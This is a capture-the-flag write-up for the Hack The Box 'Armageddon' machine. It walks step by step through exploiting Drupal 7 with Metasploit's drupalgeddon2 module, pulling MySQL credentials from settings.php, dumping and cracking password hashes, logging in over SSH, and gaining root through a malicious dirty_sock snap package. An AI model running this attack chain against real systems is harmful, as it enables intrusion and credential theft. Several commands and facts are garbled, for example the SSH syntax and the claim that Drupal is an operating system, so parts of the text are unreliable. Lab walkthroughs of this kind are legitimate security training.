ARMAGEDDON WRITE UP
WELCOME TO TAMILCODE
HERE TRICKS AND TECHNOLOGY
SO IN THE SECTION, WE GOING TO SEE THE WRITE-UP FOR THE ARMAGEDDON MACHINE SO FIRST TURN YOUR HACK THE BOX VPN .... LET WE START ...BEFORE THAT PLEASE SEE THE OLD WRITE-UP (BEGINNER)...
SO FIRST LOAD THE IP ADDRESS IN THE BROWSER YOU CAN ABLE THE SEE THE WEBSITE SHOWN IN THE IMAGE.
IT IS THE TARGET MACHINE WE GOING TO ATTACK.
so first we took the Nmap scan for any interesting ports and services.
STEP 1: nmap -sC -sV 10.10.10.233
the result is given below
In this Nmap scan, we were able the inserting service and port for ssh... and drupal 7
Drupal 7 is an operating system there is a vulnerability for this and you are able to see the
Drupal 7 in source code of website also...
so next open the Metasploit using msfconsole...
STEP 2: use exploit/uinx/webapp/drupal_drupalgeddon2
STEP 3: set rhost 10.10.10.233
STEP 4: set lport tun0
so in the lport use VPN IP address only !!! or
give simply tun0 which would take the VPN IP also....!!!
STEP 5: run
so just wait for two minutes you will be able to get a session ......
so now to get the meterpreter session which has been shown in the image...
so there are many folders in this machine and I have checked all folders but nothing is
interesting and I enter into
cd var/www/html/sites/default/ and give the ls for listing the file
there we get setting.php so the cat file using the below command
STEP 6: cat setting.php
so further I have checking file I got the MySQL username and password
WHAT IS MYSQL?
MySQL is nothing but is a database for storing your sensitive information like
password and username or any email id etc .....
So next we going to get shell using the command below ( you want to type in the meterpreter )
STEP 7: shell
now you get a shell like this ( shown in image )
STEP 8: mysql -u drupaluser -pCQHEy@9M*m23gBVj -D
drupal -e 'select name,pass from users;'
WARING :
please give the query correct otherwise you got error ..... and don't leave space for giving
password ... read it carefully...
now get the user and password ... so in this case the username and password will be in
hash now we going to decode it using john the ripper .....
STEP 8: john hash.txt
so type the john and give the file name ...
in this scenario, I have already cracked the password that image has been show below ...
if you already cracked hash if want try that hash another time
please give the below command
STEP 9: john hash.txt --show
so you get username which brucetherealadmin and password booboo
so above scenario, you get username and password now we going login in the ssh port
using these credentials...
we see the ssh port open in the Nmap report now we going to log in...
STEP 10: ssh 10.10.10.233@brucetherealadmin
now it will ask the password so give the booboo
now you get the shell in the machine .....
type ls for listing the file
BOOOOOOOOOOOOOOM !!!!
now you get the user flag which is user.txt
STEP 11: cat user.txt
Show in the below image ........................................................
so next we going to take over the root flag using privilege escalation.
so checked manually using the below command...
STEP 12: sudo -l
now you will be able to see snap install
so this case the root access but no password ...
by searching this in google I got the dirty_stock exploit .....
you download using below link :
so now we going to exploit this machine using the snap
copy and paste from the GitLab
NOTE :
now you want to go to the back directory using cd .. command ......
so now enter into tmp folder because there executes permission ..
here we going to create an exploit .....
now i have saved the file which is tamil.snap show in the above picture ...
use the python3 ( see the below picture )
STEP 13: sudo /usr/bin/snap install --devmode tamil.snap
by giving the above command dirty_sock will be install
STEP 14: su dirty_sock
it will ask password.. the default password is dirty_sock ...
NOTE :defaultusername : dirty_sockpassword : dirty_sock
STEP 15: sudo -i
now it will change into root user
BOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOM!!
STEP 16: cat root.txt
now you get the root flag which is root.txt
I HOPE YOU WILL UNDERSTAND THIS ARTICLE SO PLEASE SUBSCRIBE TO MY WEBSITE AND LIKE , SHARE,COMMENT ETC...IF YOU LIKE OUR WORKS AND VIDEO PLEASE SUPPORT US USING THE BELOW LINK
Post a Comment